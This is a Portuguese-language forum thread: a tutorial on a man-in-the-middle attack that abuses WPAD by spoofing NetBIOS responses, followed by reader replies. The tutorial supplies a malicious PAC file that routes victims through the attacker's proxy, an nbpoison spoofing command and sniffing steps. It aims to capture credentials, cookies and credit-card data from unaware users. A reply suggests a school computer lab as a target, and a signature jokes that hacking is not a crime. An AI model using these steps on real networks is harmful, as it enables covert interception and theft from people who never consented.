Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Sniffando dados (MITM) por falha em WPAD

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Sniffando dados (MITM) por falha em WPAD

    Mais uma tentativa da Microsoft em dominar o mundo que deu errado e até hoje traz prejuízo aos usuários do Rwindows.
    A ideia inicial era simplificar a configuração de proxies em grandes redes de computadores. A Micro$oft até tentou obrigar, no final da década de 90, o IETF (Internet Engineering Task Force) a tornar o protocolo padrão, mas não foi aprovado.
    Também pudera... Trata-se do WPAD (Web Proxy Auto Discovery). Você agora vai entender como funciona esse protocolo e ver como ele é frágil.

    Como funciona?
    Em um simples resumo, o WPAD serve pra detectar e configurar um servidor de proxy automaticamente.
    O WPAD, por padrão, já está ativo no browser quando ele está configurado para detectar as configurações de rede automaticamente. O Internet Explorer já vem com esta opção ativa.
    Quando você digita o endereço do website, o navegador verifica pela existência de um arquivo PAC (Proxy Auto Configuration), com sintaxe JavaScript. Este arquivo deve estar na raiz do servidor web (por exemplo, no diretório public_html) com o nome 'wpad.dat' ou 'proxy.pac'.
    Este arquivo indica as configurações de proxy melhores para acessar aquele servidor. A partir de então vai utilizar as configurações indicadas para setar o proxy. Veja um exemplo de arquivo PAC:
    Código:
    function FindProxyForURL(url, host) {
    	return "PROXY 192.168.1.1:3128";
    }
    Muito suspeito, não acha? Pois encerram-se as suspeitas e entram as evidências.

    Como é invadido?
    Nossa missão é realizar um ataque man-in-the-middle (MITM), aproveitando da fragilidade oferecida no modo em que o WPAD procura pelo arquivo PAC no servidor. Tudo isso sem que o alvo fique sabendo, nem mesmo enganado por engenharia social.
    Vamos forjar este arquivo, configurando remotamente o navegador do usuário a usar nosso próprio proxy.
    Há mais de uma maneira de executar o MITM por este protocolo, mas hoje vamos ver apenas explorá-lo spoofando pacotes NetBIOS.
    Se você sniffar este protocolo, verá que há requisições broadcast (Endereço IP destinatário com final 255) NetBIOS, do tipo WPAD.
    Para iniciar o ataque vamos precisar de um Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., para podermos explorar o nosso arquivo PAC (wpad.dat). Vamos criar nosso arquivo, configurando-o com nosso endereço IP:
    Código:
    function FindProxyForURL(url, host) {
    	return "PROXY SEU.IP.AQ.UI:8080";
    }
    Grave este arquivo na raíz do webserver (/var/www, /home/user/public_html, C:\wamp\www...). Ele será acessado pelo endereço Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
    Vamos configurar também um servidor proxy. Você pode Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ou Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., este último desenvolvido pelo WhiteCollarGroup. Se não me falha a memória, acredito que o Acunetix também possui um servidor proxy. Utilize seu predileto.
    Leve em conta que, além de ter o servidor proxy ativo, você vai precisar sniffar todo o tráfego do proxy. O Burp Suite, como é um software desenvolvido para análise de rede, já possui essa funcionalidade. Outros servidores comuns não possuem tal funcionalidade, mas você não precisa deixar de utilizar seu servidor predileto por causa disso. Utilize sniffers como Wireshark ou Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...).
    Coloque seu proxy para escutar na porta 8080 (levando em conta que indicamos a porta 8080 no arquivo PAC). Se necessário, coloque também seu sniffer para capturar dados trafegados por essa porta.
    Feito isso, vamos spoofar os pacotes NB. Vamos utilizar o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
    Após o download, execute no terminal como root:
    Código:
    ./nbpoison -s seu.ip.aq.ui
    A partir daí, usuários de sua rede utilizarão sua máquina para requisições broadcast, e sua máquina está preparada para responder a essas requisições.
    Se você ler os logs do Apache, vai perceber que usuários estão fazendo requisições em método GET ao seu arquivo wpad.dat. Com isso você saberá que o alvo já importou suas configurações, e já está utilizando sua máquina como proxy.

    Por que é invadido?
    Se você voltar à janela do sniffer, verá que todos os dados trafegados passam por ele.
    Isto quer dizer que é possível ler dados privilegiados, mesmo em método POST (dados enviados em oculto pelos headers HTTP) e cookies.
    Ou seja, você poderá ler desde credenciais de e-mails e redes sociais até dados de cartões de crédito.

    Este é um ataque em que o alvo pode desconhecer o fato antes, durante e depois de ser atacada.
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Similar Threads

  • Font Size
    #2
    o tuto parece bom mas nao entendi muito bem um video seria bom
    eu tenho que salva esse codigo como php html?
    e dps fazer oque com ele hospedar? e manda link pra vitima?

    Comment


    • Font Size
      #3
      um video seria bom
      No momento isto não seria possível para mim. Você pode sugerir ao amigo #M0rph, do fórum.

      eu tenho que salva esse codigo como php html?
      e dps fazer oque com ele hospedar?
      Você salva este código como wpdat.dat e usar uma instalação própria do Apache (servidor web no seu computador).

      e manda link pra vitima?
      Este é um ataque de rede que ocorre sem o conhecimento da vítima. A magia ocorre quando você faz o spoof de pacotes NetBIOS, fazendo com que todas as máquinas de sua rede (sala de informática de sua escola, por exemplo) usem seu computador como proxy.
      Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



      Notify-list · Twitter · Blog

      Nova lei: Invadir computadores protegidos é crime.
      Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

      Comment

      X
      Working...
      X